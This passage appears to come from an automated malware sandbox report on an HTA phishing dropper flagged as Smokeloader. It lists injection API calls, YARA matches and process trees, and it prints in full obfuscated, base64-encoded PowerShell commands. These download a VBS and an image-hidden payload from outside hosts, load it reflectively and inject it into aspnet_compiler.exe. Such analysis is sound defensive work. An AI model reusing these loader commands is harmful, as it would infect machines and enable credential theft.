yQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402F5D RtlCreateUserThread,NtTerminateProcess,13_2_00402F5D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess,13_2_00402321
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004025D3 NtClose,13_2_004025D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014EB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022F7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402686 NtClose,13_2_00402686
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004030BF RtlCreateUserThread,NtTerminateProcess,13_2_004030BF
                Source: C:\Windows\explorer.exeCode function: 14_2_03444760 NtCreateSection,14_2_03444760
                Source: C:\Windows\explorer.exeCode function: 14_2_03442FAC NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,14_2_03442FAC
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D64B92 RtlMoveMemory,NtUnmapViewOfSection,17_2_02D64B92
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D633C3 NtQueryInformationFile,17_2_02D633C3
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D6349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,17_2_02D6349B
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D6342B NtQueryObject,NtQueryObject,RtlMoveMemory,17_2_02D6342B
                Source: C:\Windows\explorer.exeCode function: 18_2_001E38B0 NtUnmapViewOfSection,18_2_001E38B0
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_00661016 RtlMoveMemory,NtUnmapViewOfSection,19_2_00661016
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_03043D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,20_2_03043D8D
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_03042E1B OpenProcess,lstrcmpiA,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW,20_2_03042E1B
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_03041F4E NtCreateSection,NtMapViewOfSection,20_2_03041F4E
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_03041FE5 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,20_2_03041FE5
                Source: C:\Windows\explorer.exeCode function: 21_2_00715300 NtUnmapViewOfSection,21_2_00715300
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00321016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,22_2_00321016
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00321819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,22_2_00321819
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00321A80 NtCreateSection,NtMapViewOfSection,22_2_00321A80
                Source: C:\Windows\explorer.exeCode function: 26_2_0072355C NtUnmapViewOfSection,26_2_0072355C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 27_2_02D51016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,27_2_02D51016
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 27_2_02D518BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,27_2_02D518BF
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 27_2_02D51B26 NtCreateSection,NtMapViewOfSection,27_2_02D51B26
                Source: C:\Windows\explorer.exeCode function: 28_2_00AB370C NtUnmapViewOfSection,28_2_00AB370C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_02B998D69_2_02B998D6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_02B99E109_2_02B99E10
                Source: C:\Windows\explorer.exeCode function: 14_2_0344284014_2_03442840
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D6219817_2_02D62198
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D6C2F917_2_02D6C2F9
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D7B35C17_2_02D7B35C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02DB443817_2_02DB4438
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D7B97E17_2_02D7B97E
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D66E6A17_2_02D66E6A
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D85F0817_2_02D85F08
                Source: C:\Windows\explorer.exeCode function: 18_2_001E1E2018_2_001E1E20
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0066170B19_2_0066170B
                Source: C:\Windows\explorer.exeCode function: 21_2_00712C0021_2_00712C00
                Source: C:\Windows\explorer.exeCode function: 26_2_0072286026_2_00722860
                Source: C:\Windows\explorer.exeCode function: 26_2_0072205426_2_00722054
                Source: C:\Windows\explorer.exeCode function: 28_2_00AB2A0428_2_00AB2A04
                Source: C:\Windows\explorer.exeCode function: 28_2_00AB20F428_2_00AB20F4
                Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02D68801 appears 38 times
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3484 -s 724
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2034
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2358
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2034Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2358Jump to behavior
                Source: 0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 6168, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.phis.bank.troj.spyw.expl.evad.winHTA@41/36@2/3
                Source: C:\Windows\explorer.exeCode function: 14_2_03443BF4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,SleepEx,14_2_03443BF4
                Source: C:\Windows\explorer.exeCode function: 14_2_034435E8 CoCreateInstance,14_2_034435E8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seemybestnetworkwhichgivebestthingsentirelifewithme[1].tiffJump to behavior
                Source: C:\Users\user\AppData\Roaming\djvbaaeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7076:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_03
                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3484
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vfmfrl0q.rww.ps1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS"
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 3B8F.tmp.17.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaReversingLabs: Detection: 21%
                Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES60DC.tmp" "c:\Users\user\AppData\Local\Temp\tnaq44gy\CSCA55E465C63A145CC9DC9276A53775DB5.TMP"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\djvbaae C:\Users\user\AppData\Roaming\djvbaae
                Source: C:\Users\user\AppData\Roaming\djvbaaeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3484 -s 724
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
